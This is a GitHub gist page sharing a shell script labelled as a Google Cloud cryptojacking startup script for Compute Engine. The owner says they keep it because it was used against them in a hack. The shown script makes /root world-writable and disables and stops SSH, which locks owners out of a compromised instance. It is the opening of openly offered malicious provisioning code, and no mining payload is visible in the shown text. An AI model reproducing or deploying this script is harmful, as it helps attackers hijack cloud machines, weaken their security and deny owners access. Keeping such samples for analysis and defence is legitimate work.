Skip to content

Instantly share code, notes, and snippets.

View officialmelon's full-sized avatar

Melon officialmelon

  • Brisbane, QLD
  • 22:54 (UTC +10:00)
View GitHub Profile
@officialmelon
officialmelon / startup_script.sh
Created July 24, 2022 23:28 — forked from dataslayermedia/startup_script.sh
Google Cloud Platform Cryptojacking Startup Script for Compute Engine Provisioning via API
# The only reason I have this script is because it was used against me in a hack...
if [ -f "/root/start.sh" ]; then
exit 0
fi
chmod 777 /root
systemctl disable ssh.service || true
systemctl stop ssh.service || true